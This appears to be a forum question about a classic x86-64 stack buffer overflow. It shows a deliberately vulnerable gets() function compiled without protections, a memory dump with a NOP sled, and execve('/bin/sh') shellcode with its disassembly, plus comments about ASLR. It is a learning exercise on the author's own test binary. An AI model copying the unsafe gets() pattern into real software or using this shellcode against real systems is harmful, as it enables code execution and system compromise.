# Bufferoverflow Stack

Tags: linux, buffer-overflow, stack, x86-64

I want to do a buffer overflow exploit in the stack. For this i read in data via the "gets"-function.

```
void ExploitMe()
{
  char buffer[256];
  gets(buffer);
}
```

I compile this file with

```
gcc test.c -o vuln -z execstack -fno-stack-protector
```

I want to spawn a shell with my bufferoverflow. For this i implemented a nop-slide and put my opcodes to spawn this shell at the end of the nop-slide. After this, I override my return address to an address in my slide.
 Here is my memory:

`0x7fffffffde40: 0x90909090 0x90909090  0x90909090  0x90909090
0x7fffffffde50: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffde60: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffde70: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffde80: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffde90: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffdea0: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffdeb0: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffdec0: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffded0: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffdee0: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffdef0: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffdf00: 0x90909090  0x90909090  0x90909090  0x90909090
0x7fffffffdf10: 0x90909090  0x2fbb4890  0x6e69622f  0x4868732f
0x7fffffffdf20: 0x5308ebc1  0x50e78948  0xe6894857  0x050f3bb0
0x7fffffffdf30: 0x42424242  0x42424242  0x42424242  0x42424242
0x7fffffffdf40: 0x42424242  0x42424242  0xffffdea0  0x00007fff`

My return address is 0x00007fffffffdea0, which is an addresss in the middle of the nop-slide.

(I got the opcodes from the following assembler code: 
`0000000000000000 <__start>:
   0:   48 bb 2f 2f 62 69 6e    movabs rbx,0x68732f6e69622f2f
   7:   2f 73 68 
   a:   48 c1 eb 08             shr    rbx,0x8
   e:   53                      push   rbx
   f:   48 89 e7                mov    rdi,rsp
  12:   50                      push   rax
  13:   57                      push   rdi
  14:   48 89 e6                mov    rsi,rsp
  17:   b0 3b                   mov    al,0x3b
  19:   0f 05                   syscall`
)

When i assemble, link and execute the assembler code, i get a shell as wanted.

When I step each instruction with gdb, a error occurs **after** the execution of the code to spawn a shell, but no shell is spawned.

When I execute the vulnerable program with the input like seen above outside of gdb, i get a segmentation fault.

Has anybody an idea, why i can't spawn a shell inside or outside of gdb?

I used the following examples:

[Liveoverflow: youtube](https://www.youtube.com/watch?v=8QzOC8HfOqU)

[Arc Network Security: youtube](https://www.youtube.com/watch?v=9q1VL8UU8h0)

I use Ubuntu 16.04 and X86-64.

Comment: Have you disabled ASLR so that the stack will be loaded each time at the same location?

Comment: I somehow thought ASLR is turned of by compiling with "-fno-stack-protection". But ASLR is OS made and has nothing to do with compilers ^^
Thanks @bart1e for the tipp!